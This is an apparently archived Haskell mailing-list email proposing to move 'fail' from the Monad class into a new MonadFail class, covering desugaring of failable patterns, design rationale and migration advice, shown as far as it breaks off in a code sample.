Next: If, Up: Conditional Syntax The simplest sort of conditional is #ifdef MACRO controlled text #endif /* MACRO */ This block is called a conditional group. controlled text will be included in the output of the preprocessor if and only if MACRO is defined. We say that the conditional succeeds if MACRO is defined, fails if it is not. The controlled text inside of a conditional can include preprocessing directives. They are executed only if the conditional succeeds. You can nest conditional groups inside other conditional groups, but they must be completely nested. In other words, `#endif' always matches the nearest `#ifdef' (or `#ifndef', or `#if'). Also, you cannot start a conditional group in one file and end it in another. Even if a conditional fails, the `#endif' is not required, but it is a good practice if there is a lot of controlled text, because it helps people match the `#endif' to the corresponding `#ifdef'. Older programs sometimes put MACRO directly after the `#endif' without enclosing it in a comment. This is invalid code according to the C standard. CPP accepts it with a warning. It never affects which `#ifndef' the `#endif' matches. Sometimes you wish to use some code if a macro is not defined. You can do this by writing `#ifndef' instead of `#ifdef'. One common use of `#ifndef' is to include code only the first time a header file is included. See Once-Only Headers. Macro definitions can vary between compilations for several reasons. Here are some samples.
http://gcc.gnu.org/onlinedocs/gcc-3.3.6/cpp/Ifdef.html
crawl-001
refinedweb
250
66.64
A touchy subject—defining an IPO from scratch Many paths of motion of objects are hard to model by hand, for example, when we want the object to follow a precise mathematical curve or if we want to coordinate the movement of multiple objects in a way that is not easily accomplished by copying IPOs or defining IPO drivers. Imagine the following scenario: we want to interchange the position of some objects over the duration of some time in a fluid way without those objects passing through each other in the middle and without even touching each other. This would be doable by manually setting keys perhaps, but also fairly cumbersome, especially if we would want to repeat this for several sets of objects. The script that we will devise takes care of all of those details and can be applied to any two objects. Code outline: orbit.py The orbit.py script that we will design will take the following steps: - Determine the halfway point between the selected objects. - Determine the extent of the selected objects. - Define IPO for object one. - Define IPO for object two. Determining the halfway point between the selected objects is easy enough: we will just take the average location of both objects. Determining the extent of the selected objects is a little bit more challenging though. An object may have an irregular shape and determining the shortest distance for any rotation of the objects along the path that the object will be taking is difficult to calculate. Fortunately, we can make a reasonable approximation, as each object has an associated bounding box. This bounding box is a rectangular box that just encapsulates all of the points of an object. If we take half the body diagonal as the extent of an object, then it is easy to see that this distance may be an exaggeration of how close we can get to another object without touching, depending on the exact form of the object. But it will ensure that we never get too close. This bounding box is readily available from an object's getBoundBox() method as a list of eight vectors, each representing one of the corners of the bounding box. The concept is illustrated in the following figure where the bounding boxes of two spheres are shown: The length of the body diagonal of a bounding box can be calculated by determining both the maximum and minimum values for each x, y, and z coordinate. The components of the vector representing this body diagonal are the differences between these maximums and minimums. The length of the diagonal is subsequently obtained by taking the square root of the sum of squares of the x, y, and z components. The function diagonal() is a rather terse implementation as it uses many built-in functions of Python. It takes a list of vectors as an argument and then iterates over each component (highlighted. x, y, and z components of a Blender Vector may be accessed as 0, 1, and 2 respectively): def diagonal(bb): maxco=[] minco=[] for i in range(3): maxco.append(max(b[i] for b in bb)) minco.append(min(b[i] for b in bb)) return sqrt(sum((a-b)**2 for a,b in zip(maxco,minco))) It determines the extremes for each component by using the built-in max() and min() functions. Finally, it returns the length by pairing each minimum and maximum by using the zip() function. The next step is to verify that we have exactly two objects selected and inform the user if this isn't the case by drawing a pop up (highlighted in the next code snippet). If we do have two objects selected, we retrieve their locations and bounding boxes. Then we calculate the maximum distance w each object has to veer from its path to be half the minimum distance between them, which is equal to a quarter of the sum of the lengths of the body diagonals of those objects: obs=Blender.Scene.GetCurrent().objects.selected if len(obs)!=2: Draw.PupMenu('Please select 2 objects%t|Ok') else: loc0 = obs[0].getLocation() loc1 = obs[1].getLocation() bb0 = obs[0].getBoundBox() bb1 = obs[1].getBoundBox() w = (diagonal(bb0)+diagonal(bb1))/4.0 Before we can calculate the trajectories of both objects, we first create two new and empty Object IPOs: ipo0 = Ipo.New('Object','ObjectIpo0') ipo1 = Ipo.New('Object','ObjectIpo1') We arbitrarily choose the start and end frames of our swapping operation to be 1 and 30 respectively, but the script could easily be adapted to prompt the user for these values. We iterate over each separate IPO curve for the Location IPO and create the first point (or key frame) and thereby the actual curve by assigning a tuple (framenumber, value) to the curve (highlighted lines of the next code). Subsequent points may be added to these curves by indexing them by frame number when assigning a value, as is done for frame 30 in the following code: for i,icu in enumerate((Ipo.OB_LOCX,Ipo.OB_LOCY,Ipo.OB_LOCZ)): ipo0[icu]=(1,loc0[i]) ipo0[icu][30]=loc1[i] ipo1[icu]=(1,loc1[i]) ipo1[icu][30]=loc0[i] ipo0[icu].interpolation = IpoCurve.InterpTypes.BEZIER ipo1[icu].interpolation = IpoCurve.InterpTypes.BEZIER Note that the location of the first object keyframed at frame 1 is its current location and the location keyframed at frame 30 is the location of the second object. For the other object this is just the other way around. We set the interpolation modes of these curves to "Bezier" to get a smooth motion. We now have two IPO curves that do interchange the location of the two objects, but as calculated they will move right through each other. Our next step therefore is to add a key at frame 15 with an adjusted z-component. Earlier, we calculated w to hold half the distance needed to keep out of each other's way. Here we add this distance to the z-component of the halfway point of the first object and subtract it for the other: mid_z = (loc0[2]+loc1[2])/2.0 ipo0[Ipo.OB_LOCZ][15] = mid_z + w ipo1[Ipo.OB_LOCZ][15] = mid_z - w Finally, we add the new IPOs to our objects: obs[0].setIpo(ipo0) obs[1].setIpo(ipo1) The full code is available as swap2.py in the file orbit.blend (download full code from here). The resulting paths of the two objects are sketched in the next screenshot: A lot to swallow—defining poses Many cartoon characters seem to have difficulties trying to swallow their food, and even if they did enjoy a relaxing lunch, chances are they will be forced through a rain pipe too small to fit comfortably for no apparent reason. It is difficult to animate swallowing or any other peristaltic movement by using shape keys as it is not the shape of the overall mesh that changes in a uniform way: we want to move along a localized deformation. One way of doing that is to associate an armature consisting of a linear chain of bones with the mesh that we want to deform (shown in the illustration) and animate the scale of each individual bone in time. This way, we can control the movement of the 'lump' inside to a great extent. It is, for example, possible to make the movement a little bit halting as it moves from bone to bone to simulate something that is hard to swallow. In order to synchronize the scaling of the individual bones in a way that follows the chain from parent to child, we have to sort our bones because the bones attribute of the Pose object that we get when calling getPose() on an armature is a dictionary. Iterating over the keys or values of this dictionary will return those values in random order. Therefore, we define a function sort_by_parent() that will take a list of Pose bones pbones and will return a list of strings, each the name of a Pose bone. The list is sorted with the parent as the first item followed by its children. Obviously, this will not return a meaningful list for armatures that have bones with more than one child, but for our linear chain of bones it works fine. In the following code, we maintain a list of names called bones that hold the names of the Pose bones in the correct order. We pop the list of Pose bones and add the name of the Pose bone as long as it is not already added (highlighted). We compare names instead of Pose bone objects because the current implementation of Pose bones does not reliably implement the in operator: def sort_by_parent(pbones): bones=[] if len(pbones)<1 : return bones bone = pbones.pop(0) while(not bone.name in bones): bones.append(bone.name) We then get the parent of the bone that we just added to our list, and as long as we can traverse the chain of parents, we insert this parent (or rather its name) in our list in front of the current item (highlighted below). If the chain cannot be followed anymore we pop a new Pose bone. When there are no bones left, an IndexError exception is raised by the pop() method and we will exit our while-loop: parent = bone.parent while(parent): if not parent.name in bones: bones.insert(bones.index(bone.name),parent.name) parent = parent.parent bone = parent try: bone = pbones.pop(0) except IndexError: break return bones The next step is to define the script itself. First, we get the active object in the current scene and verify if it is indeed an armature. If not, we alert the user with a pop up (highlighted part of the following code), otherwise we proceed and get the associated armature data with the getData() method: scn = Blender.Scene.GetCurrent() arm = scn.objects.active if arm.getType()!='Armature': Blender.Draw.PupMenu("Selected object is not an Armature%t|Ok") else: adata = arm.getData() Then, we make the armature editable and make sure that each bone has the HINGE option set (highlighted). The business with the conversion of the list of options to a set and back again to a list once we added the HINGE option is a way to ensure that the option appears only once in the list. adata.makeEditable() for ebone in adata.bones.values(): ebone.options = list(set(ebone.options)|set([Blender.Armature.HINGE])) adata.update() A pose is associated with an armature object, not with its data, so we get it from arm by using the getPose() method. Bone poses are very much like ordinary IPOs but they have to be associated with an action that groups those poses. When working interactively with the Blender an action gets created automatically once we insert a key frame on a pose, but in a script we have to create an action explicitly if it is not present already (highlighted): pose = arm.getPose() action = arm.getAction() if not action: action = Blender.Armature.NLA.NewAction() action.setActive(arm) The next step is to sort the Pose bones as a chain of parenthood by using our previously defined function. What is left is to step along the frames in steps of ten at a time and set keys on the scale of each bone at each step, scaling up if the sequence number of the bone matches our step and resetting it if it doesn't. One of the resulting IPOs is shown in the screenshot. Note that by our setting the HINGE attribute on each bone previously, we prevent the scaling to propagate to the children of the bone: bones = sort_by_parent(pose.bones.values()) for frame in range(1,161,10): index = int(frame/21)-1 n = len(bones) for i,bone in enumerate(bones): if i == index : size = 1.3 else : size = 1.0 pose.bones[bone].size=Vector(size,size,size) pose.bones[bone].insertKey(arm,frame, Blender.Object.Pose.SIZE) The full code is available as peristaltic.py in peristaltic.blend. Application of peristaltic.py to an armature To use this script you will have to run it with an armature object selected. One recipe to show its application would be the following: - Add an armature to a scene. - Go to edit mode and extrude any number of bones from the tip of the first bone. - Go to object mode and add a mesh centered on the position of the armature. Any mesh will do but for our illustration we use a cylinder with plenty of subdivisions. - Select the mesh and then shift select the armature. Both armature and Mesh object are now selected while the armature is the active object. - Press Ctrl + P and select armature. In next pop up, select Create from bone heat. That will create a vertex group on the mesh for each bone in the armature. These vertex groups will be used to deform the mesh when we associate the armature as a modifier with the mesh. - Select the mesh and add an armature modifier. Type the name of the armature in the Ob: field and make sure that the Vert.Group toggle is selected and Envelopes is not. - Select the armature and run the peristaltic.py. The result will be an animated Mesh object resembling a lump passing through a narrow flexible pipe. A few frames are shown in the illustration: Rain pipes are of course not the only hollow objects fit for animating this way as shown in the following illustration: Get down with the beat—syncing shape keys to sound Many a rock video today features an animation of speaker cones reverberating with the sound of the music. And although the features for the manipulation of sound in the Blender API are rather sparse, we will see that this effect is rather simple to achieve. The animation that we will construct depends mainly on the manipulation of shape keys. Shape keys can be understood as distortions of a base mesh. A mesh can have many of these distortions and each of them is given a distinct name. The fun part is that Blender provides us with the possibility to interpolate between the base shape and any of the distorted shapes in a continuous way, even allowing us to mix contributions from different shapes. One way to animate our speaker cone, for instance, is to model a basic, undistorted shape of the cone; add a shape key to this base mesh; and distort it to resemble a cone that is pushed outward. We can then blend between this "pop out" shape and the base's shape depending on the loudness of the sound. Animating by setting key frames in Blender means creating IPOs and manipulating IPO curves as we have seen earlier. Indeed, Shape or Key IPOs are very similar to other kinds of IPOs and are manipulated very much in the same way. The main difference between for example an Object IPO and a Shape IPO is that the individual IPO curves of a Shape IPO are not indexed by some predefined numerical constant (such as Ipo.OB_LOCX for an Object) but by a string because the user may define any number of named shapes. Also, a Shape IPO is not accessed via an Object but through its underlying Mesh object (or Lattice or Curve, as these may have shape keys as well). Manipulating sound files So now that we know how to animate shapes, our next goal is to find out how to add some sound to our mesh, or rather to determine at each frame how much the distorted shape should be visible. As mentioned in the previous section, Blender's API does not provide many tools for manipulating sound files, Basically the Sound module provides us with ways to load and play a sound file but that's as far as it gets. There is no way to access individual points of the waveform encoded in the file. Fortunately, standard Python distributions come bundled with a wave module that provides us with the means to read files in the common .wav format. Although it supports only the uncompressed format, this will suffice as this format is very common and most audio tools, such as Audacity, can convert to this format. With this module we can open a .wav file, determine the sample rate and duration of the sound clip, and access individual samples. As we will see in the explanation of the following code, we still have to convert these samples to values that we can use as key values for our shape keys but the heavy lifting is already done for us. Code outline: Sound.py Armed with the knowledge on how to construct IPO curves and access .wav files, we might draw up the following code outline: - Determine if the active object has suitable shapes defined and provide a choice. - Let the user select a .wav file. - Determine the number of sound samples per second present in the file. - Calculate the number of animation frames needed based on the duration of the sound file and the video frame rate. - Then, for each animation frame: - Average the sound samples occurring in this frame - Set the blend value of the chosen IPO curve to this (normalized) average The full code is available as Sound.py in sound000.blend and explained as follows: import Blender from Blender import Scene,Window,Draw from Blender.Scene import Render import struct import wave We start off by importing the necessary modules including Python's wave module to access our .wav file and the struct module that provides functions to manipulate the actual binary data that we get from the .wav file. Next, we define a utility function to pop up a menu in the middle of our screen. It behaves just like the regular PupMenu() function from the Draw module but sets the cursor to a position halfway across and along the screen with the help of the GetScreenSize() and SetMouseCoords() functions from Blender's Window module: def popup(msg): (w,h)=Window.GetScreenSize() Window.SetMouseCoords(w/2,h/2) return Draw.PupMenu(msg) The bulk of the work will be done by the function sound2active(). It will take two arguments—the filename of the .wav file to use and the name of the shape key to animate based on the information in the .wav file. First, we attempt to create a WaveReader object by calling the open() function of the wave module (highlighted). If this fails, we show the error in a pop up and quit: def sound2active(filename,shapekey='Pop out'): try: wr = wave.open(filename,'rb') except wave.Error,e: return popup(str(e)+'%t|Ok') Then we do some sanity checks: we first check if the .wav file is a MONO file. If you want to use a stereo file, convert it to mono first, for example with the free Audacity package (). Then we check if we are dealing with an uncompressed .wav file because the wave module cannot handle other types. (most .wav files are uncompressed but if needed, Audacity can convert them as well) and we verify that the samples are 16-bits. If any of these checks fail, we pop up an appropriate error message: c = wr.getnchannels() if c!=1 : return popup('Only mono files are supported%t|Ok') t = wr.getcomptype() w = wr.getsampwidth() if t!='NONE' or w!=2 : return popup('Only 16-bit, uncompresses files are supported%t|Ok') Now that we can process the file, we get its frame rate (the number of audio samples per second) and the total number of bytes (oddly enough by using the awkwardly named function getnframes() from the wave module). Then, we read all of these bytes and store them in the variable b. fr= wr.getframerate() n = wr.getnframes() b = wr.readframes(n) Our next task is to get the rendering context from the current scene to retrieve the number of video frames per second. The number of seconds our animation will play is determined by the length of our audio sample, something we can calculate by dividing the total number of audio frames in the .wav file by the number of audio frames per second (highlighted in the following piece of code). We then define a constant sampleratio—the number of audio frames per video frame: scn = Scene.GetCurrent() context = scn.getRenderingContext() seconds = float(n)/fr sampleratio = fr/float(context.framesPerSec()) As mentioned before, the wave module gives us access to a number of properties of a .wav file and the raw audio samples, but provides no functions to convert these raw samples to usable integer values. We therefore need to do this ourselves. Fortunately, this is not as hard as it may seem. Because we know that the 16-bit audio samples are present as 2 byte integers in the "little-endian" format, we can use the unpack() function from Python's struct module to efficiently convert the list of bytes to a list of integers by passing a fitting format specification. (You can read more about the way .wav files are laid out on.) samples = struct.unpack('<%dh'%n,b) Now we can start animating the shape key. We get the start frame from the rendering context and calculate the end frame by multiplying the number of seconds in the .wav file with the video frame rate. Note that this may be longer or shorter than the end frame that we may get from the rendering context. The latter determines the last frame that will get rendered when the user clicks on the Anim button, but we will animate the movement of our active object regardless of this value. Then for each frame we calculate from start frame to end frame (exclusive) the average value of the audio samples that occur in each video frame by summing these audio samples (present in the samples list) and dividing them by the number of audio samples per video frame (highlighted in the next code snippet). We will set the chosen shape key to a value in the range [0:1] so we will have to normalize the calculated averages by determining the minimum and maximum values and calculate a scale: staframe = context.startFrame() endframe = int(staframe + seconds*context.framesPerSec()) popout=[] for i in range(staframe,endframe): popout.append(sum(samples[int( (i-1)*sampleratio):int(i*sampleratio)])/sampleratio) minvalue = min(popout) maxvalue = max(popout) scale = 1.0/(maxvalue-minvalue) Finally, we get the active object in the current scene and get its Shape IPO (highlighted). We conclude by setting the value of the shape key for each frame in the range we are considering to the scaled average of the audio samples: ob=Blender.Scene.GetCurrent().objects.active ipo = ob.getData().getKey().getIpo() for i,frame in enumerate(range(staframe,endframe)): ipo[shapekey][frame]=(popout[i]-minvalue)*scale The remaining script itself is now rather simple. It fetches the active object and then tries to retrieve a list of shape key names from it (highlighted in the next part). This may fail (hence the try ... except clause) if for example the active object is not a mesh or has no associated shape keys, in which case we alert the user with a pop up: if __name__ == "__main__": ob=Blender.Scene.GetCurrent().objects.active try: shapekeys = ob.getData().getKey().getIpo().curveConsts key = popup('Select a shape key%t|'+'|'.join(shapekeys)) if key>0: Window.FileSelector (lambda f:sound2active(f,shapekeys[key-1]), "Select a .wav file", Blender.Get('soundsdir')) except: popup('Not a mesh or no shapekeys defined%t|Ok') If we were able to retrieve a list of shape keys, we present the user with a pop-up menu to choose from this list. If the user selects one of the items, key will be positive and we present the user with a file selector dialog (highlighted). This file selector dialog is passed a lambda function that will be called if the user selects a file, passing the name of this selected file as an argument. In our case we construct this lambda function to call the sound2active() function defined previously with this filename and the selected shape key. The initial directory that will be presented to the user in the file selector to pick a file from is determined by the last argument to the FileSelector() function. We set it to the contents of Blender's soundsdir parameter. This usually is // (that is, a relative path pointing to the same directory as the .blend file the user is working on) but may be set in the user preferences window (File Paths section) to something else. Animating a mesh by a .wav file: the workflow Now that we have our Sounds.py script we can apply it as follows: - Select a Mesh object. - Add a "Basis" shape key to it (Buttons window, Editing context, Shapes panel). This will correspond to the least distorted shape of the mesh. - Add a second shape key and give it a meaningful name. - Edit this mesh to represent the most distorted shape. - In object mode, run Sound.py from the text editor by pressing Alt + P. - Select the shape key name defined earlier (not the "Basis" one) from the pop up. - Select the .wav file to apply. The result will be an object with an IPOcurve for the chosen shape key that will fluctuate according to the beat of the sound as shown in the next screenshot: Summary In this article we saw how to associate shape keys with a mesh and how to add an IPO to animate transitions between those shape keys. Specifically, we learned how to: - Define IPOs - Define shape keys on a mesh - Define IPOs for those shape keys - Pose armatures - Group changes in poses into actions If you have read this article you may be interested to view : - Blender 2.49 Scripting: Animating the Visibility of objects - Blender 2.49 Scripting: Impression using Different Mesh on Each Frame of Object
https://www.packtpub.com/books/content/blender-249-scripting-shape-keys-ipos-and-poses
CC-MAIN-2015-18
refinedweb
4,358
62.17
Hi I know how to import a individual file def cvt(s,default=-1): try: return float(s) except ValueError: return default import csv with open("Dealer1.txt", "rb") as csvfile: reader = csv.reader(csvfile, delimiter="\t") data = list(reader) I have a folder that contains 50+ files, using Glob, I created the following code import os import glob os.chdir('c:/Performance') files = glob.glob('*.txt') print files Now is there a way that instead of me importing individual files I can actual import all 50 files data at the same time, all 50 have the same layout can I import all the data from the txt files in one go Jezza
http://forums.devshed.com/python-programming/936485-importing-50-txt-files-python-last-post.html
CC-MAIN-2018-17
refinedweb
113
60.04
Hello, C# public class Cls { public void foo(object a) { Console.WriteLine("foo #1"); } public void foo(object[] a) { Console.WriteLine("foo #2"); } } Ruby: Cls.new.foo(7) Cls.new.foo([3, 4]) Output: foo #1 foo #1 <-- Calling foo(object a) again So how can I call foo(object[] a)? - Alex on 2009-01-09 17:16 on 2009-01-09 18:34 You'll need to build a CLR array rather than a Ruby array. require 'mscorlib' System::Array.create_instance(System::Object.to_clr_type, 2) o = System::Array.create_instance(System::Object.to_clr_type, 2) >>> o[0] = 3 >>> o[1] = 4 You can monkey-patch Array and add this as a helper: class Array def to_clr_ary o = System::Array.create_instance(System::Object.to_clr_type, length) each_with_index { |obj, i| o[i] = obj } o end end CLR arrays and Ruby arrays are totally different; Ruby arrays are much more similar to "List<object>" than to "object[]". So it's unlikely that IronRuby would ever do this conversion automatically for you. on 2009-01-09 18:41 [3,4] is not an array of objects. It's a RubyArray. You can create a CLR array like this: v = System::Array.of(Object).new(3) [1,2,3].each_with_index { |x,i| v[i] = x } Tomas on 2009-01-09 21:12 Thank you!
https://www.ruby-forum.com/topic/175325
CC-MAIN-2018-09
refinedweb
217
51.65
As I mentioned in my previous Ruby on Rails tutorial, Unobtrusive JavaScript (UJS) is one of the coolest new features in Rails 3. UJS allows Rails-generated code to be much cleaner, helps separate your JavaScript logic from your HTML layouts, and uncouples Rails from the Prototype JavaScript library. In this tutorial, we're going to look at these features and learn how to use them in a simple Rails 3 application. Background: What is Unobtrusive JavaScript? To start off, what exactly is UJS? Simply, UJS is JavaScript that is separated from your HTML markup. The easiest way to describe UJS is with an example. Take an onclick event handler; we could add it obtrusively: <a href='#' onclick='alert("Inline Javscript")'>Link</a> Or we could add it unobtrusively by attaching the event to the link (using jQuery in this example): <a href='#'>Link</a> <script> $('a').bind('click', function() { alert('Unobtrusive!'); } </script> As mentioned in my introduction, this second method has a variety of benefits, including easier debugging and cleaner code. "Rails 3, on the other hand, is JavaScript framework agnostic. In other words, you can use your JavaScript framework of choice, provided a Rails UJS implementation exists for that framework." Up until version 3, Ruby on Rails generated obtrusive JavaScript. The resulting code wasn't clean, but even worse, it was tightly coupled to the Prototype JavaScript framework. This meant that unless you created a plugin or hacked Rails, you had to use the Prototype library with Rail's JavaScript helper methods. Rails 3, on the other hand, is JavaScript framework agnostic. In other words, you can use your JavaScript framework of choice, provided a Rails UJS implementation exists for that framework. The current UJS implementations include the following: Rails 3 now implements all of its JavaScript Helper functionality (AJAX submits, confirmation prompts, etc) unobtrusively by adding the following HTML 5 custom attributes to HTML elements. - data-method - the REST method to use in form submissions. - data-confirm - the confirmation message to use before performing some action. - data-remote - if true, submit via AJAX. - data-disable-with - disables form elements during a form submission For example, this link tag <td><a href="/posts/2" class="delete_post" data-Destroy</a></td> would send an AJAX delete request after asking the user "Are you sure?." You can imagine how much harder to read that would be if all that JavaScript was inline. Now that we've reviewed UJS and how Rails implements UJS, let's set up a project and look at some specific applications. We'll be using the jQuery library and UJS implementation in this tutorial. Step 1: Setting up the Project Since we're creating a new project from scratch, the first thing we need to do is create the project by typing the following: rails new blog --skip-prototype Notice that I'm instructing Rails to skip the prototype JavaScript file, since I'm going to be using the jQuery library. Let's start the server just to make sure everything appears to be working. And, voila! Now that we've set up our project, we need to add jQuery and the jQuery UJS to our project. You are free to organize your JavaScript however you want, but the Rails convention for structuring your JavaScript files is as follows (all these files go in public/javascripts): - framework JavaScript file (jquery.js, prototype.js, or mootools.js) - rails.js - the code implementing rails UJS (for whatever framework you've chosen) - application.js - your application JavaScript If you haven't already, download jquery.js (or refer to a CDN) and rails.js and include them in your public/javascripts directory. The last thing we need to do to get up and running is to actually tell Rails to include these js files on each of our pages. To do this, open application.rb in your config directory and add the following line config.action_view.JavaScript_expansions[:defaults] = %w(jquery rails application) This configuration item tells Rails to include the three JavaScript files mentioned above by default. Alternatively, you could grab jQuery from a CDN (i.e.) by manually included a script tag pointing to the correct location. If you do this, be sure to remove 'jquery' from the JavaScript_expansions configuration item. Step 2: Generating Some Code To demonstrate the rails UJS functionality, we're first going to have to have some code to work with. For this demo we're just going to have a simple Post object. Let's generate that now rails generate scaffold Post name:string title:string content:text And then let's migrate our database to create the posts table. rake db:migrate Ok, we're good to go! If we navigate to, we should see a form to create a new Post. Ok, it's all working! Now let's dig in and see how to use the UJS and AJAX functionality baked into Rails. Step 3: Adding AJAX Now that all the required JavaScript files are being included, we can actually start using Rails 3 to implement some AJAX functionality. Although you can write all of the custom JavaScript that you want, Rails provides some nice built-in methods that you can use to easily perform AJAX calls and other JavaScript actions. Let's look at a couple of commonly used rails helpers and the JavaScript they generate AJAX Form Submission and Javascript ERB Files If we look at our Posts form, we can see that whenever we create or edit a Post, the form is manually submitted and then we're redirected to a read-only view of that Post. What if we wanted to submit that form via AJAX instead of using a manual submission? Rails 3 makes it easy to convert any form to AJAX. First, open your _form.html.erb partial in app/views/posts, and change the first line from: <%= form_for(@post) do |f| %> to <%= form_for(@post, :remote => true) do |f| %> Prior to Rails 3, adding :remote => true would have generated a bunch of inline JavaScript inside the form tag, but with Rails 3 UJS, the only change is the addition of an HTML 5 custom attribute. Can you spot it? <form accept- The attribute is data-remote="true", and the Rails UJS JavaScript binds to any forms with that attribute and submits them via AJAX instead of a traditional POST. That's all that's needed to do the AJAX submit, but how do we perform a callback after the AJAX call returns? The most common way of handling a return from an AJAX call is through the use of JavaScript ERB files. These work exactly like your normal ERB files, but contain JavaScript code instead of HTML. Let's try it out. The first thing we need to do is to tell our controller how to respond to AJAX requests. In posts_controller.rb (app/controllers) we can tell our controller to respond to an AJAX request by adding format.js in each respond_to block that we are going to call via AJAX. For example, we could update the create action to look like this: def create @post = Post.new(params[:post]) respond_to do |format| if @post.save format.html { redirect_to(@post, :notice => 'Post created.') } format.js else format.html { render :action => "new" } format.js end end end Because we didn't specify any options in the respond_to block, Rails will respond to JavaScript requests by loading a .js ERB with the same name as the controller action (create.js.erb, in this case). Now that our controller knows how to handle AJAX calls, we need to create our views. For the current example, add create.js.erb in your app/views/posts directory. This file will be rendered and the JavaScript inside will be executed when the call finishes. For now, we'll simply overwrite the form tag with the title and contents of the blog post: $('body').html("<h1><%= escape_javaScript(@post.title) %></h1>").append("<%= escape_javaScript(@post.content) %>"); Now if we create a new Post we get the following on the screen. Success! The advantage of this method is that you can intersperse ruby code that you set up in your controller with your JavaScript, making it really easy to manipulate your view with the results of a request. AJAX Callbacks Using Custom JavaScript Events Each Rails UJS implementation also provides another way to add callbacks to our AJAX calls - custom JavaScript events. Let's look at another example. On our Posts index view (), we can see that each post can be deleted via a delete link. Let's AJAXify our link by adding :remote=>true and additionally giving it a CSS class so we can easily find this POST using a CSS selector. <td><%= link_to 'Destroy', post, :confirm => 'Are you sure?', :method => :delete, :remote=>true, :class=>'delete_post' %></td> Which produces the following output: <td><a href="/posts/2" class="delete_post" data-Destroy</a></td> Each rails UJS AJAX call provides six custom events that can be attached to: - ajax:before - right before ajax call - ajax:loading - before ajax call, but after XmlHttpRequest object is created) - ajax:success - successful ajax call - ajax:failure - failed ajax call - ajax:complete - completion of ajax call (after ajax:success and ajax:failure) - ajax:after - after ajax call is sent (note: not after it returns) In our case we'll add an event listener to the ajax:success event on our delete links, and make the deleted post fade out rather than reloading the page. We'll add the following JavaScript to our application.js file. $('.delete_post').bind('ajax:success', function() { $(this).closest('tr').fadeOut(); }); We'll also need to tell our posts_controller not to try to render a view after it finishes deleting the post. def destroy @post = Post.find(params[:id]) @post.destroy respond_to do |format| format.html { redirect_to(posts_url) } format.js { render :nothing => true } end Now when we delete a Post it will gradually fade out. Conclusion Well, there you have it. Now you know how to make AJAX calls using Rails 3 UJS. While the examples explained were simple, you can use these same techniques to add all kinds of interactivity to your project. I hope you'll agree that it's a big improvement over previous versions, and that you'll try it out on your next Rails project. What techniques do you use when implementing AJAX in Rails?
http://code.tutsplus.com/tutorials/using-unobtrusive-javascript-and-ajax-with-rails-3--net-15243
CC-MAIN-2014-52
refinedweb
1,734
63.29
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello *, the subject says it all. After we successfully put `=>` into Monad, it is time to remove something in return: `fail`. Like with the AMP, I wrote up the proposal in Markdown format on Github, which you can find below as a URL, and in verbatim copy at the end of this email. It provides an overview over the intended outcome, which design decisions we had to take, and how our initial plan for the transition looks like. There are also some issues left open to discussion. Here's a short abstract: - - Move `fail` from `Monad` into a new class `MonadFail`. - - Code using failable patterns will receive a more restrictive `MonadFail` constraint. Code without this constraint will be safe to use for all Monads. - - Transition will take at least two GHC releases. GHC 7.12 will include the new class, and generate warnings asking users to make their failable patterns compliant. - - Stackage showed an upper bound of less than 500 breaking code fragments when compiled with the new desugaring. For more details, refer to the link or the paste at the end. Let's get going! David aka quchen =============================================================== =============================================================== =============================================================== will also be posted on the ghc-devs@ and libraries@ mailing lists, as well as on Reddit. Overview - -------- - - **The problem** - reason for the proposal - - **MonadFail class** - the solution - - **Discussion** - explaining our design choices - - **Adapting old code** - how to prepare current code to transition smoothly - - **Esimating the breakage** - how much stuff we will break (spoiler: not much) - - **Transitional strategy** - how to break as little as possible while transitioning - - **Current status** The problem - ----------- Currently, the `<-` symbol is unconditionally desugared as follows: ```haskell do pat <- computation >>> let f pat = more more >>> f _ = fail "..." >>> in computation >>= f ``` The problem with this is that `fail` cannot (!) be sensibly implemented for many monads, for example `State`, `IO`, `Reader`. In those cases it defaults to `error`. As a consequence, in current Haskell, you can not use `Monad`-polymorphic code safely, because although it claims to work for all `Monad: ```haskell, ```haskell do x <- action >>> let f x = more more >>> in action >>= f ``` In particular, the programmer can assert any pattern be unfailable by making it irrefutable using a prefix tilde: ```haskell do ~pat <- action >>> let f ~pat = more more >>> in action >>= f ``` A class of patterns that are conditionally failable are `newtype`s, and single constructor `data` types, which are unfailable by themselves, but may fail if matching on their fields is done with failable paterns. ```haskell. ```haskell. ```haskell do PatternSynonym x <- action >>> let f PatternSynonym x = more more >>> in f _ = fail "..." >>> in action >>= f ``` Discussion - ---------- - - Although for many `MonadPlus` `fail _ = mzero`, a separate `MonadFail` class should be created instead of just using that. - A parser might fail with an error message involving positional information. Some libraries, like `Binary`, provide `fail` as their only interface to fail a decoding step. - Although `STM` is `MonadPlus`, it uses the default `fail = error`. It will therefore not get a `MonadFail` instance. - - What laws should `fail` follow? **Left zero**, ```haskell ∀ s f. fail s >>= f ≡ fail s ``` A call to `fail` should abort the computation. In this sense, `fail` would become a close relative of `mzero`. It would work well with the common definition `fail _ = mzero`, and give a simple guideline to the intended usage and effect of the `MonadFail` class. - - Rename `fail`? **No.** Old code might use `fail` explicitly and we might avoid breaking it, the Report talks about `fail`, and we have a solid migration strategy that does not require a renaming. - - Remove the `String` argument? **No.** The `String` might help error reporting and debugging. `String` may be ugly, but it's the de facto standard for simple text in GHC. No high performance string operations are to be expected with `fail`, so this breaking change would in no way be justified. Also note that explicit `fail` calls would break if we removed the argument. - - How sensitive would existing code be to subtle changes in the strictness behaviour of `do` notation pattern matching? **It doesn't.** The implementation does not affect strictness at all, only the desugaring step. Care must be taken when fixing warnings by making patterns irrefutable using `~`, as that *does* affect strictness. (Cf. difference between lazy/strict State) - - The `Monad` constraint for `MonadFail` seems unnecessary. Should we drop or relax it? What other things should be considered? - Applicative `do` notation is coming sooner or later, `fail` might be useful in this more general scenario. Due to the AMP, it is trivial to change the `MonadFail` superclass to `Applicative` later. (The name will be a bit misleading, but it's a very small price to pay.) - The class might be misused for a strange pointed type if left without any constraint. This is not the intended use at all. I think we should keep the `Monad` superclass for three main reasons: - We don't want to see `(Monad m, MonadFail m) =>` all over the place. - The primary intended use of `fail` is for desugaring do-notation anyway. - Retroactively removing superclasses is easy, but adding them is hard (see AMP). Adapting old code - ----------------- - - Help! My code is broken because of a missing `MonadFail` instance! *Here are your options:* 1. Write a `MonadFail` instance (and bring it into scope) ```haskell #if !MIN_VERSION_base(4,11,0) -- Control.Monad.Fail import will become redundant in GHC 7.16+ import qualified Control.Monad.Fail as Fail #endif import Control.Monad instance Monad Foo where (>>=) = <...bind impl...> -- NB: `return` defaults to `pure` #if !MIN_VERSION_base(4,11,0) -- Monad(fail) will be removed in GHC 